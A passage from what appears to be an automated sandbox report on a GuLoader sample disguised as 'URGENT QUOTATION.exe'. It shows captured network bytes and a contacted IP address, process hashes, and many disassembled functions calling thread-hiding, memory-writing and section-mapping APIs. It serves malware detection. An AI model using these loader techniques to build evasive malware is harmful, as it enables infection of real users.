Feb 22, 2021 19:55:28.941482067 CET	2471	IN	Data Raw: 66 52 49 75 36 54 66 42 59 4c 51 6e 2f 4a 33 65 43 63 46 64 45 37 69 34 64 77 6d 48 63 6b 57 45 72 4a 73 6d 55 37 65 49 73 47 6e 4c 78 70 56 70 56 45 54 49 34 6b 56 4d 33 56 43 55 77 31 2b 58 64 52 50 52 61 4d 30 6b 36 34 6a 4c 31 4c 45 46 6b 42 Data Ascii: fRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCyWmbPJ/8uIQJ/XbiL8bNKvv0vWlLCb0fQjR9zuU1y+sSkjcqsgPAzCVGFWzPpYxJM9GAMXhGRinD85xkrCxEomEY7I7j/40IEvjWlJ7wDzjJZtmbCW/cChOPPtlICMGX
Feb 22, 2021 19:55:28.941499949 CET	2472	IN	Data Raw: 4b 48 76 68 43 42 69 35 6a 36 30 42 63 69 38 6f 65 2b 45 4b 45 50 72 59 6d 67 2b 51 4e 4e 4f 77 33 50 64 43 4c 67 70 42 55 52 4f 50 51 31 38 6d 58 31 5a 45 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 Data Ascii: KHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAA
Feb 22, 2021 19:55:28.941518068 CET	2473	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 Data Ascii: <li> <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> 51.195.53.221/p.php (port 80

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: URGENT QUOTATION.exe PID: 6160 Parent PID: 5912

General

Start time:	19:55:00
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\URGENT QUOTATION.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Imagebase:	0x400000
File size:	135168 bytes
MD5 hash:	B49C71BE94624173A9683580C792B195
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: URGENT QUOTATION.exe PID: 6792 Parent PID: 6160

General

Start time:	19:55:11
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\URGENT QUOTATION.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\URGENT QUOTATION.exe'
Imagebase:	0x400000
File size:	135168 bytes
MD5 hash:	B49C71BE94624173A9683580C792B195
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: URGENT QUOTATION.exe PID: 6160 Parent PID: 5912 URGENT QUOTATION.exeCOMMON

Executed Functions

Function 021845FA, Relevance: 14.6, APIs: 2, Strings: 6, Instructions: 553COMMON

Download Yara Rule

Strings

el32, xrefs: 02183AF9
1.!T, xrefs: 02180657
D*, xrefs: 02182509
advapi32, xrefs: 02183B47
TEMP=, xrefs: 02183BB5
ntdll, xrefs: 02183B7D

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID: 1.!T$TEMP=$advapi32$el32$ntdll$D*
API String ID: 0-98177842
Opcode ID: ce1f264c664b81c608227216cd5ad434e1fccec68e5d9b31d492d2395c5c1b12
Instruction ID: e1d723c269a4bb81631dca9b28ce719c948b2e06f3c2add4720b8072d527aa63
Opcode Fuzzy Hash: ce1f264c664b81c608227216cd5ad434e1fccec68e5d9b31d492d2395c5c1b12
Instruction Fuzzy Hash: C30297B06C438AAFEB263B20CDD0BEA3B66AF46754F154119FE955B1C1D7B48884CF50

Uniqueness

Uniqueness Score: -1.00%

Function 021804E7, Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 443nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(0218057E,?,00000000,?,02184849,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02180509
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B

Strings

el32, xrefs: 02183AF9
1.!T, xrefs: 02180657
D*, xrefs: 02182509
advapi32, xrefs: 02183B47

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T$advapi32$el32$D*
API String ID: 1954852945-1332962403
Opcode ID: 8ec06540dbd49f70c3a3db9a7d2a62a320cad743c81d5f3641d31fcaed1a72de
Instruction ID: f7551938b872c43485b3b99305bb4fdb0179edeb53ff4a834f01ed96229db5e9
Opcode Fuzzy Hash: 8ec06540dbd49f70c3a3db9a7d2a62a320cad743c81d5f3641d31fcaed1a72de
Instruction Fuzzy Hash: 71E188B06C034AAFFB263E20CDD0BEA3666AF45754F614228FE556B1C0C7B59884CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0218216A, Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 538nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B

Strings

el32, xrefs: 02183AF9
1.!T, xrefs: 02180657
D*, xrefs: 02182509
advapi32, xrefs: 02183B47

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T$advapi32$el32$D*
API String ID: 4046476035-1332962403
Opcode ID: e3b9c34cfbb8950a7320ed0214fff954b4978cbb990b45a13843469100f2285f
Instruction ID: 963cca02d1e4c31abe274d2b735658363b682966138e1d3e6ae5a451edc9de41
Opcode Fuzzy Hash: e3b9c34cfbb8950a7320ed0214fff954b4978cbb990b45a13843469100f2285f
Instruction Fuzzy Hash: BE0276B06C0389AFEB267F24CDD4BEA3666AF45350F614228FE565B1C0C7B59884CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0218613D, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 238nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B
NtMapViewOfSection.NTDLL ref: 021863B2

Strings

el32, xrefs: 02183AF9
1.!T, xrefs: 02180657
advapi32, xrefs: 02183B47

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationSectionThreadView
String ID: 1.!T$advapi32$el32
API String ID: 190281133-2267316713
Opcode ID: 56a4f8a27725307431537dbc6bdaf8f2a9b3ce62c128fdc708fd78726215187e
Instruction ID: 66a5781511fc4d6c839036d444ab4845eafc5b9db2944f68d45592807a69a221
Opcode Fuzzy Hash: 56a4f8a27725307431537dbc6bdaf8f2a9b3ce62c128fdc708fd78726215187e
Instruction Fuzzy Hash: 4C7178306C438ADEEF2A7F2489D47F93B969F46314F66426ADD725B2C5C3748884CE42

Uniqueness

Uniqueness Score: -1.00%

Function 021820B4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 144nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B

Strings

el32, xrefs: 02183AF9
1.!T, xrefs: 02180657
advapi32, xrefs: 02183B47

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T$advapi32$el32
API String ID: 4046476035-2267316713
Opcode ID: 19f526ebe53ebf64aadb2859f4c4480fad898cbc6b5049737f47a244837db45d
Instruction ID: b4a77ec08a8dc7519eddf47314143a6f54165008a3ad1f24695d7c0ec873c0b8
Opcode Fuzzy Hash: 19f526ebe53ebf64aadb2859f4c4480fad898cbc6b5049737f47a244837db45d
Instruction Fuzzy Hash: 3341DBB02C430AAEEF253B644DD4BF937425F4AB94F650256ED612F1C4D7A18C45CE91

Uniqueness

Uniqueness Score: -1.00%

Function 021805AB, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 130nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B

Strings

el32, xrefs: 02183AF9
1.!T, xrefs: 02180657
advapi32, xrefs: 02183B47

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$advapi32$el32
API String ID: 543350213-2267316713
Opcode ID: f312893609de89903c71648d5cdca4ce02da86f2b0d5707daef51d7cb2c7beae
Instruction ID: 129ad344bff076aa9beb90f9b1df32c656b15dbdd4fdb130e6ab228a222c94dc
Opcode Fuzzy Hash: f312893609de89903c71648d5cdca4ce02da86f2b0d5707daef51d7cb2c7beae
Instruction Fuzzy Hash: 0631EEB06C835A6EEB213B644CD07EA3B425F4AB54F65025AEDA12F1C0D7618C49CE91

Uniqueness

Uniqueness Score: -1.00%

Function 0218058F, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B

Strings

el32, xrefs: 02183AF9
1.!T, xrefs: 02180657
advapi32, xrefs: 02183B47

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$advapi32$el32
API String ID: 543350213-2267316713
Opcode ID: 09ae5914d532187b9486a41bbaefb70062cef1551dac0e07b5b2de01f4cfd4bc
Instruction ID: 6e4bd66644364c96fa768427f6a62eb370df403cc976e0a53d74b2afd494530d
Opcode Fuzzy Hash: 09ae5914d532187b9486a41bbaefb70062cef1551dac0e07b5b2de01f4cfd4bc
Instruction Fuzzy Hash: 5731F0B06C431E6EEF253B744DD47EA3B424F4AB94F610255EDA23B2C0D7618C49CE91

Uniqueness

Uniqueness Score: -1.00%

Function 021805CD, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B

Strings

el32, xrefs: 02183AF9
1.!T, xrefs: 02180657
advapi32, xrefs: 02183B47

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$advapi32$el32
API String ID: 543350213-2267316713
Opcode ID: 092f251a4e6f5abc46d36698a47095ff880a5477b0f89ffbb8a9f14e433e967c
Instruction ID: 22750c7a1b7ef585841d2dc7849d0b2983fd04926927e0e7c347319241ee3709
Opcode Fuzzy Hash: 092f251a4e6f5abc46d36698a47095ff880a5477b0f89ffbb8a9f14e433e967c
Instruction Fuzzy Hash: 0031FCB06C835A6EEB2137644CD47EA3B428F46B54F650289EDA12F1C0D7A18C48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02180602, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B

Strings

el32, xrefs: 02183AF9
1.!T, xrefs: 02180657
advapi32, xrefs: 02183B47

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$advapi32$el32
API String ID: 543350213-2267316713
Opcode ID: 0f8893eb62d0ac815e5e6983488695886eed37c9c7d1f66cc9bce16000bc350b
Instruction ID: 2c0c28831fae1cf84b99a391b287352d9fe10359d8d93735ae31fc51c1475f0b
Opcode Fuzzy Hash: 0f8893eb62d0ac815e5e6983488695886eed37c9c7d1f66cc9bce16000bc350b
Instruction Fuzzy Hash: 3131DEB45C835E6EEB2137744CD07EA3B429F4AB54F65029AADB12F1C0D7608848CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0218063F, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 97nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B

Strings

el32, xrefs: 02183AF9
1.!T, xrefs: 02180657
advapi32, xrefs: 02183B47

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$advapi32$el32
API String ID: 543350213-2267316713
Opcode ID: 77644effa86e671c369a02c776d14f521f55d939865ec7bd22f310933b20af67
Instruction ID: 70b01ba6106520689adda90cbd441542bbc38107ca352b6002e1cd444a605839
Opcode Fuzzy Hash: 77644effa86e671c369a02c776d14f521f55d939865ec7bd22f310933b20af67
Instruction Fuzzy Hash: 5321CCF45C939B6AEB1177644CD07AA7F459F4AA48F25029AACA12B1C0D7608C49CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0218182B, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 689COMMON

Download Yara Rule

Strings

D*, xrefs: 02182509

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: D*
API String ID: 1029625771-570881808
Opcode ID: e45c698591299870d4add6937033f67d4a1a2f4d3ea112c81cbf1b5abbbea824
Instruction ID: 671f8b623b3709a0754c0a18e51a2e5a45517cd0cccbed44f7f0b6bea38a01fb
Opcode Fuzzy Hash: e45c698591299870d4add6937033f67d4a1a2f4d3ea112c81cbf1b5abbbea824
Instruction Fuzzy Hash: BC325872780346AFEB29AF14CDD0BE573A6FF05310F154229EDA997280D774A885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 021853EC, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 463COMMON

Download Yara Rule

Strings

D*, xrefs: 02182509

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: D*
API String ID: 1029625771-570881808
Opcode ID: 719d4ddb484ce4f233fd1ed75bdaf76c457e2533eab61800baf993e14e387b08
Instruction ID: 730a6fafd1ccf87b18a3f26bf25146a167facda95fee214045a9399f1ccb07eb
Opcode Fuzzy Hash: 719d4ddb484ce4f233fd1ed75bdaf76c457e2533eab61800baf993e14e387b08
Instruction Fuzzy Hash: 19E124706C0245AFFB2A3E24CDD0BEA36A7EF41350FA64229ED565A1C0D7B99884CF41

Uniqueness

Uniqueness Score: -1.00%

Function 021814E5, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 367COMMON

Download Yara Rule

Strings

D*, xrefs: 02182509

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID: D*
API String ID: 0-570881808
Opcode ID: bbcbd718fc28bb50d443ef093e5712bb94b797b34bdbfcf8b98e73702cdd69eb
Instruction ID: 03765f4fac092f38c3c59124273c73ac006dff16f3c13e688cc1390163be5719
Opcode Fuzzy Hash: bbcbd718fc28bb50d443ef093e5712bb94b797b34bdbfcf8b98e73702cdd69eb
Instruction Fuzzy Hash: 3AC14271680289AFFB263E20CDD5BEA3266AF51710F654128FE999B1C0C7B99885CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0218247B, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 300nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Strings

D*, xrefs: 02182509

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: D*
API String ID: 3569954152-570881808
Opcode ID: 00c082a17632510a6134a4ea7d888b8997815a9e2e4c336c4f04a78e0967ed66
Instruction ID: a58f3f7b5b5a04c43139ecd64ce784ce6a215056bb828d64c6928a60e09f8a37
Opcode Fuzzy Hash: 00c082a17632510a6134a4ea7d888b8997815a9e2e4c336c4f04a78e0967ed66
Instruction Fuzzy Hash: E0A125706C0389AFFB262E20CED1BEA3666FF45754F654128FE959B1C0C7B994848F44

Uniqueness

Uniqueness Score: -1.00%

Function 021824D3, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 278nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Strings

D*, xrefs: 02182509

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: D*
API String ID: 3569954152-570881808
Opcode ID: c2d4cebd80bf02b952dc8aa5ddea8064a1d64b5ed9d02ba72d521e31dd83a7bb
Instruction ID: 16fb168590dfcfcc7dd7e3be96a36fe8f52aa891101d133ff97bc526d5df1967
Opcode Fuzzy Hash: c2d4cebd80bf02b952dc8aa5ddea8064a1d64b5ed9d02ba72d521e31dd83a7bb
Instruction Fuzzy Hash: 9E91257068028AAFFB267E20CED1BEA3666FF05754F554128FE959B1C0C7B99484CF44

Uniqueness

Uniqueness Score: -1.00%

Function 021824EB, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 275nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Strings

D*, xrefs: 02182509

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: D*
API String ID: 3569954152-570881808
Opcode ID: 9117e6bd5f5c98d66aecce1459d8b396cdfe6de3880c8a048f0af35684340a25
Instruction ID: 55b72e9c938ce6e6d15dc283e1430e91215708ea4a76546b3d85c99353b92b3b
Opcode Fuzzy Hash: 9117e6bd5f5c98d66aecce1459d8b396cdfe6de3880c8a048f0af35684340a25
Instruction Fuzzy Hash: 5F9125B068028AAFFB267E20CED1BEA366AFF05354F554128FD959B1C0C7B99484CF44

Uniqueness

Uniqueness Score: -1.00%

Function 02180701, Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

el32, xrefs: 02183AF9
advapi32, xrefs: 02183B47

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID:
String ID: advapi32$el32
API String ID: 0-1963003133
Opcode ID: 62c7f2c56549f3e1cb4a7e12918931d799299ae3f66bd953349339acb64c1e92
Instruction ID: 81021541d4457aec6133d7fe99cb2b82c802992e05afd4013fadfabe7755d144
Opcode Fuzzy Hash: 62c7f2c56549f3e1cb4a7e12918931d799299ae3f66bd953349339acb64c1e92
Instruction Fuzzy Hash: 2C117AF448934A5AEB11BB6449D43A67F58DF0798CF0902C99CA16B1C2D340880ACF94

Uniqueness

Uniqueness Score: -1.00%

Function 02182523, Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 84575b6f4f15e9260be79ab6d9c2cfa087ddc621b7e2c855f371ee79f572fdee
Instruction ID: 2f7dd9760aff49d9a574ff552404ec0ac8d47b9cc4cd1c6d951d610f77ea40cd
Opcode Fuzzy Hash: 84575b6f4f15e9260be79ab6d9c2cfa087ddc621b7e2c855f371ee79f572fdee
Instruction Fuzzy Hash: 4F81237068028AAFFB267E20CED1BEA366AFF15354F554128FE959B1C0C7B99484CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02182581, Relevance: 1.7, APIs: 1, Instructions: 249nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 820959a6a0b4d8b14d8372d57d04910753326b678171eb891b1abd8cec7e0dbd
Instruction ID: 4222d9128b877de9d61d9d2cc140fe36245805bb85263a433bb858c3f6da17af
Opcode Fuzzy Hash: 820959a6a0b4d8b14d8372d57d04910753326b678171eb891b1abd8cec7e0dbd
Instruction Fuzzy Hash: 3F812670680289AFFB266E10CDD1BEA3666FF11354F554228FE959B1C0C7B99488CF40

Uniqueness

Uniqueness Score: -1.00%

Function 021825B7, Relevance: 1.7, APIs: 1, Instructions: 237nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 9247b86b29bd04e71ec827e577ffd19df7802034f14a55fac8cba1456acaaf85
Instruction ID: 2e551666ea1f9d8c079ac6dc711087c74d94989ea752b6b6dd06fe7f910c3545
Opcode Fuzzy Hash: 9247b86b29bd04e71ec827e577ffd19df7802034f14a55fac8cba1456acaaf85
Instruction Fuzzy Hash: 7271257068028AAFFB266E20CED1BEA3666FF15754F554128FE959B1C0C3B994C8CF44

Uniqueness

Uniqueness Score: -1.00%

Function 02182605, Relevance: 1.7, APIs: 1, Instructions: 230nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: e259a9560d844b00c4f905eea5568a3efe84e82f40a2665875cd2e060c8dc84a
Instruction ID: e01ec9a545741166acdf447172e6bb471ccdb271b1e091c383bd7c291b17b91c
Opcode Fuzzy Hash: e259a9560d844b00c4f905eea5568a3efe84e82f40a2665875cd2e060c8dc84a
Instruction Fuzzy Hash: 65711470684389AFFB266E20CDD5BEA366AFF01354F144128FE959A1C1C7B99488CF44

Uniqueness

Uniqueness Score: -1.00%

Function 021826B2, Relevance: 1.7, APIs: 1, Instructions: 202nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 18dbb6d44d9b7dc46be3406b66963b9f2e89f93693df98e48c3837ecad8495d0
Instruction ID: 9d658befd36ac3c2ee899aa9954a461b08924bdd29933a78cb194c719bc70642
Opcode Fuzzy Hash: 18dbb6d44d9b7dc46be3406b66963b9f2e89f93693df98e48c3837ecad8495d0
Instruction Fuzzy Hash: 7C610170680289AFFF266E10CED1BEA366AFF05754F144128FE959A1D1C3B998C88F40

Uniqueness

Uniqueness Score: -1.00%

Function 02182666, Relevance: 1.7, APIs: 1, Instructions: 194nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 112ac412be7e40d9618e66c391cbd39b0f471dbbd9a62a13346eaefa393f02af
Instruction ID: a151c1a09c2d19793e92d7e23bcbf2a1bc2d9ffba822e904ebef646c9100273f
Opcode Fuzzy Hash: 112ac412be7e40d9618e66c391cbd39b0f471dbbd9a62a13346eaefa393f02af
Instruction Fuzzy Hash: 5E51F3706C0289AFFF262E10CED5BEA366ABF15754F144128FE969A1D1C3B994C89F40

Uniqueness

Uniqueness Score: -1.00%

Function 021826F9, Relevance: 1.7, APIs: 1, Instructions: 185nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 54cd7b61d84e3a333dbc29a2368d40026e98df0f72a8d72cfcc756f73a019528
Instruction ID: b8846a2a660ae5500e68c9cd054f856bf1a72ff8d4ffdc0557b582c6d20b68f6
Opcode Fuzzy Hash: 54cd7b61d84e3a333dbc29a2368d40026e98df0f72a8d72cfcc756f73a019528
Instruction Fuzzy Hash: 6F510E706C0289AFFF362E10CED1BEA366AEF15754F140128FE859A1D1C3B998C88F40

Uniqueness

Uniqueness Score: -1.00%

Function 02182689, Relevance: 1.7, APIs: 1, Instructions: 184nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
